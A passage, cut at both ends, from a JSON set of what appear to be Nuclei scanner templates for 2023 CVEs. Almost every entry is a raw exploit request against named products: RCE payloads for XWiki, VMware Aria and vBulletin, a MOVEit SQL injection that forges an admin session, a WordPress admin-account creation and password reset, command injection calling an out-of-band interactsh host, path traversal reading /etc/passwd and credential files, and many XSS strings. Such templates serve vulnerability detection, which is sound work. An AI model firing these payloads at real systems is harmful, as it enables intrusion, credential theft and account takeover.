Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view","{{BaseURL}}/asyncrenderer/{{url}}?clientId={{id}}&timeout=500&wiki=xwiki"],"cookie-reuse":true,"skip-variables-check":true,"extractors":[{"type":"regex","group":1,"name":"id","regex":["data-xwiki-async-client-id=\"(.+?)\""],"internal":true},{"type":"regex","group":1,"name":"url","regex":["<span class=\"xwiki-async\" data-xwiki-async-id=\"(.+?)\""],"internal":true}],"matchers":[{"type":"dsl","dsl":["body_2 == \"31557644536232\"","contains(header_2, \"text/html\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-26255","info":{"name":"STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/snjCustomDesignConfig?fileName=../dbconfig.xmlpasswd&fileMime=$textMime"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<jira-database-config>"]},{"type":"word","part":"header","words":["$textMime"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-20889","info":{"name":"VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability","severity":"high"},"requests":[{"raw":["POST /api/auth/login HTTP/2\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Vrni-Csrf-Token: null\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n","POST /api/pdfexport HTTP/2\nHost: {{Hostname}}\nX-Vrni-Csrf-Token: {{csrf}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFkpSYDWZ5w9YNjmh\n\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh\nContent-Disposition: form-data; name=\"{{randstr}}\"\n\n<!DOCTYPE HTML>\n<html>\n<head>\n<title>Test</title>\n</head>\n<body>\n<p data-vrni='vRealize'><style>@keyframes x{}</style><xss style=\"animation-name:x\" onwebkitanimationstart=\"eval(atob('{{base64(payload)}}'))\"></xss></p>\n</body>\n</html>\n------WebKitFormBoundaryFkpSYDWZ5w9YNjmh--\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]},{"type":"word","part":"header_2","words":["application/octet-stream"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["csrfToken\":\"([a-z0-9A-Z/+=]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-22620","info":{"name":"SecurePoint UTM 12.x Session ID Leak","severity":"high"},"requests":[{"raw":["POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"auth\",\"command\":[\"login\"],\"sessionid\":\"\",\"arguments\":{\"user\":\"\",\"pass\":\"\"}}\n","POST /spcgi.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json; charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n{\"module\":\"system\",\"command\":[\"config\",\"get\"],\"sessionid\":\"{{session}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"status\":\"OK\""]},{"type":"word","part":"header_2","words":["application/json"]}],"extractors":[{"type":"regex","name":"session","group":1,"regex":["\"sessionid\": \"([a-z0-9]+)\""],"internal":true}]}]},{"id":"CVE-2023-27159","info":{"name":"Appwrite <=1.2.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/avatars/favicon?url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Appwrite-Server"]}]}]},{"id":"CVE-2023-0527","info":{"name":"Online Security Guards Hiring System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-request.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata=<img%20src=x%20onerror=alert(document.domain)>&search=\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"<img src=x onerror=alert(document.domain)>\")","contains(body, \"Online Security Gauard Hiring System |Search Request\")"],"condition":"and"}]}]},{"id":"CVE-2023-20864","info":{"name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /csrf HTTP/1.1\nHost: {{Hostname}}\nX-Csrf-Token: Fetch\n","POST /api/v2/internal/cluster/applyMembership HTTP/1.1\nHost: {{Hostname}}\nX-CSRF-Token: {{xcsrftoken}}\nContent-type: application/octet-stream\n\n{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"raw\")}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["\"errorMessage\":\"Internal error"]}],"extractors":[{"type":"kval","name":"xcsrftoken","group":1,"internal":true,"kval":["X_CSRF_Token"]}]}]},{"id":"CVE-2023-26843","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /NoteEditor.php?FamilyID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nPersonID=0&FamilyID=1&NoteID=&NoteText=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&Submit=Save\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"><img src=x onerror=alert(document.domain)>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-29887","info":{"name":"Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd","{{BaseURL}}/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-26842","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /OptionManager.php?mode=classes&ListID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n1name=Member&2name=Regular+Attender&3name=Guest&4name=Non-Attender&5name=Non-Attender+%28staff%29&newFieldName=\" onfocus=alert(document.domain) autofocus=\"&AddField=Add+New+Person+Classification\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"onfocus=alert(document.domain) autofocus=\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2023-27587","info":{"name":"ReadToMyShoe - Generation of Error Message Containing Sensitive Information","severity":"medium"},"requests":[{"raw":["POST /api/add-article-by-text HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\n\n{\n  \"title\":\"Kernsicherheitstest\",\n  \"body\":\"Kernsicherheitstest\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains((body), 'https://texttospeech.googleapis.com/v1beta1/text:synthesize?key=REDACTED')"]},{"type":"word","words":["Caused by:","TTS request failed"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-29298","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}//CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-32243","info":{"name":"WordPress Elementor Lite 5.7.1 - Arbitrary Password Reset","severity":"critical"},"requests":[{"raw":["GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-json/wp/v2/users/ HTTP/1.1\nHost: {{Hostname}}\n","GET /?rest_route=/wp/v2/users HTTP/1.1\nHost: {{Hostname}}\n","GET /feed/ HTTP/1.1\nHost: {{Hostname}}\n","GET /author-sitemap.xml HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login_or_register_user&eael-resetpassword-submit=true&page_id=124&widget_id=224&eael-resetpassword-nonce={{nonce}}&eael-pass1={{password}}&eael-pass2={{password}}&rp_login={{wordpress-username}}\n"],"payloads":{"password":["{{randstr}}"]},"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers":[{"type":"word","part":"body_6","words":["\"success\":true","\"data\":"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body_1","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true},{"type":"json","part":"body","name":"wordpress-username","group":1,"json":[".[] | .slug",".[].name"],"internal":true},{"type":"regex","part":"body_4","name":"wordpress-username","group":1,"regex":["<dc:creator><!\\[CDATA\\[([A-Za-z]+)\\]\\]><\\/dc:creator>"],"internal":true},{"type":"regex","part":"body_5","name":"wordpress-username","group":1,"regex":["\\/author\\/([a-z-]+)\\/"],"internal":true}]}]},{"id":"CVE-2023-29489","info":{"name":"cPanel - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror=\"prompt(document.domain)\">aaaaaaaaaaaa"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=\"prompt(document.domain)\">aaaaaaaaaaaa","Invalid webcall ID:"],"condition":"and"},{"type":"status","status":[400]}]}]},{"id":"CVE-2023-29923","info":{"name":"PowerJob <=4.3.2 - Unauthenticated Access","severity":"medium"},"requests":[{"raw":["POST /job/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"appId\":1,\"index\":0,\"pageSize\":10}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":true,\"data\":{\"index\":0,\"pageSize\":10,"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3460","info":{"name":"Ultimate Member < 2.6.7 - Unauthenticated Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /index.php/register/?{{version}} HTTP/1.1\nHost: {{Hostname}}\n","GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n","POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser_login-{{formid}}={{username}}&user_email-{{formid}}={{email}}&user_password-{{formid}}={{password}}&confirm_user_password-{{formid}}={{password}}&first_name-{{formid}}={{firstname}}&last_name-{{formid}}={{lastname}}&form_id={{formid}}&um_request=&_wpnonce={{wpnonce}}&wp_c%C3%A0pabilities%5Badministrator%5D=1\n"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body_1), \"ultimate member\")","regex(\"wordpress_logged_in_[a-z0-9]{32}\", header_4)","status_code_4 == 302"],"condition":"and"}],"extractors":[{"type":"regex","name":"path","part":"location_2","group":1,"regex":["([a-z:/.]+)"],"internal":true},{"type":"regex","name":"version","part":"body_1","group":1,"regex":["(?i)Stable.tag:\\s?([\\w.]+)"],"internal":true},{"type":"regex","name":"formid","part":"body_3","group":1,"regex":["name=\"form_id\" id=\"form_id_([0-9]+)\""],"internal":true},{"type":"regex","name":"wpnonce","part":"body_3","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\""],"internal":true},{"type":"dsl","dsl":["\"WP_USERNAME: \"+ username","\"WP_PASSWORD: \"+ password"]}]}]},{"id":"CVE-2023-31059","info":{"name":"Repetier Server - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php"],"matchers-condition":"and","matchers":[{"type":"binary","part":"body","binary":["53514C69746520666F726D6174203300"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1835","info":{"name":"Ninja Forms < 3.6.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nf-processing&title=%253Csvg%252Fonload%253Dalert%2528document.domain%2529%253E  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Ninja Forms\")"],"condition":"and"}]}]},{"id":"CVE-2023-28432","info":{"name":"MinIO Cluster Deployment - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /minio/bootstrap/v1/verify HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"MINIO_ROOT_PASSWORD\":","\"MINIO_ROOT_USER\":","\"MinioEnv\":"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34598","info":{"name":"Gibbon v25.0.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=./gibbon.sql"],"matchers-condition":"and","matchers":[{"type":"word","words":["phpMyAdmin SQL Dump","gibbon"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0448","info":{"name":"WP Helper Lite < 4.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"><svg onload=alert(document.domain)>\")","contains(body, \"params\\\":{\\\"action\")"],"condition":"and"}]}]},{"id":"CVE-2023-1546","info":{"name":"MyCryptoCheckout < 2.124 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&\"><script>alert(/XSS/)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"scriptalert(/XSS/)/script\")","contains(body_2, \"mycryptocheckout\")"],"condition":"and"}]}]},{"id":"CVE-2023-37266","info":{"name":"CasaOS  < 0.4.4 - Authentication Bypass via Random JWT Token","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"Authorization":"{{jwt_token}}"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-36934","info":{"name":"MOVEit Transfer - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%27{{session_cookie}}%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+IpAddress=%27{{public_ip()}}%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%27{{session_cookie}}%27%23 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntransaction=signon\n","POST /human.aspx?ep={{url_encode(ep)}} HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: InitialPage=zzzz.aspx;\n\ntransaction=passchangerequest\n","POST /machine.aspx HTTP/2\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0; ASP.NET_SessionId={{session}};\n\na=a\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{session_cookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["\"refresh_token\"","\"access_token\"","\"token_type\"","\"expires_in\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ep","group":1,"regex":["\\bep=([^&]+)\""],"internal":true,"part":"body_1"},{"type":"regex","name":"session","group":1,"regex":["ASP.NET_SessionId=([^;]+)"],"internal":true,"part":"header_2"},{"type":"regex","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body_4"}]}]},{"id":"CVE-2023-30019","info":{"name":"Imgproxy <= 3.14.0 - Server-side request forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/111/rs:fit:400:400:0:0/plain/http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["Invalid source image"]},{"type":"status","status":[422]}]}]},{"id":"CVE-2023-39120","info":{"name":"Nodogsplash - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["nodogsplash","password"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0942","info":{"name":"WordPress Japanized for WooCommerce <2.5.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wc4jp-options&tab=a</script><svg/onload=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\") && contains(body_2, \"woocommerce-for-japan\")"],"condition":"and"}]}]},{"id":"CVE-2023-0562","info":{"name":"Bank Locker Management System v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /banker/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+AND+4719%3D4719--+GZHh&inputpwd=ABC&login=\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"admin\")","contains(body, \"BLMS | Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2023-1890","info":{"name":"Tablesome < 1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert`document_domain`</script>\")","contains(body_2, \"tablesome\")"],"condition":"and"}]}]},{"id":"CVE-2023-1362","info":{"name":"unilogies/bumsys < v2.0.2 - Clickjacking","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","!regex('X-Frame-Options', header)","contains(body, 'BUM</b>Sys</a>')"],"condition":"and"}]}]},{"id":"CVE-2023-1698","info":{"name":"WAGO - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"package\":\";id;#\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"license\":","\"name\":","uid=","gid="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27008","info":{"name":"ATutor < 2.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /atutor/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntoken=asdf\");}alert(document.domain);+function+asdf()+{//\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[");}alert(document.domain); function","ATutor","Login"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24737","info":{"name":"PMB v7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /pmb/admin/convert/export_z3950.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25135","info":{"name":"vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ajax/api/user/save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a\"googlelogin_vendor_autoload\"%3a0%3a{}i%3a1%3bO%3a32%3a\"Monolog\\Handler\\SyslogUdpHandler\"%3a1%3a{s%3a9%3a\"%00*%00socket\"%3bO%3a29%3a\"Monolog\\Handler\\BufferHandler\"%3a7%3a{s%3a10%3a\"%00*%00handler\"%3br%3a4%3bs%3a13%3a\"%00*%00bufferSize\"%3bi%3a-1%3bs%3a9%3a\"%00*%00buffer\"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a\"CVE-2023-25135\"%3bs%3a5%3a\"level\"%3bN%3b}}s%3a8%3a\"%00*%00level\"%3bN%3bs%3a14%3a\"%00*%00initialized\"%3bb%3a1%3bs%3a14%3a\"%00*%00bufferLimit\"%3bi%3a-1%3bs%3a13%3a\"%00*%00processors\"%3ba%3a2%3a{i%3a0%3bs%3a7%3a\"current\"%3bi%3a1%3bs%3a8%3a\"var_dump\"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["string(14)","\"CVE-2023-25135\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1080","info":{"name":"WordPress GN Publisher <1.5.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=gn-publisher-settings&tab=%22%2F+onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/ onmouseover=alert(document.domain);//\")","contains(body_2, \"GN Publisher\")"],"condition":"and"}]}]},{"id":"CVE-2023-3765","info":{"name":"MLflow Absolute Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"is_dir\":","\"path\":","\"files\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1730","info":{"name":"SupportCandy < 3.1.5 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: wpsc_guest_login_auth={\"email\":\"' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\"}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"supportcandy\")"],"condition":"and"}]}]},{"id":"CVE-2023-26360","info":{"name":"Unauthenticated File Read Adobe ColdFusion","severity":"high"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=wizardHash&_cfclient=true&returnFormat=wddx&inPassword=foo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_variables=%7b%22_metadata%22%3a%7b%22classname%22%3a%22i/../lib/password.properties%22%7d%2c%22_variables%22%3a%5b%5d%7d\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["password=","encrypted=true","adobe"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2023-28343","info":{"name":"Altenergy Power Control Software C1.2.5 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /index.php/management/set_timezone HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nAccept-Encoding: gzip, deflate\nReferer: {{RootURL}}/index.php/management/datetime\n\ntimezone=`nslookup {{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Time Zone updated successfully"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0236","info":{"name":"WordPress Tutor LMS <2.0.10 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /dashboard/retrieve-password/?reset_key=%22%3E%3Csvg%20onload=prompt(document.domain)%3E&user_id=dd HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg onload=prompt(document.domain)>\")","contains(body_2, \"Instructor Registration\")"],"condition":"and"}]}]},{"id":"CVE-2023-0563","info":{"name":"Bank Locker Management System - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /search-locker-details.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchinput=%E2%80%9C%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"/><script>alert(document.domain)</script>\")","contains(body, \"Bank Locker Management System\")"],"condition":"and"}]}]},{"id":"CVE-2023-2796","info":{"name":"EventON <= 2.1 - Missing 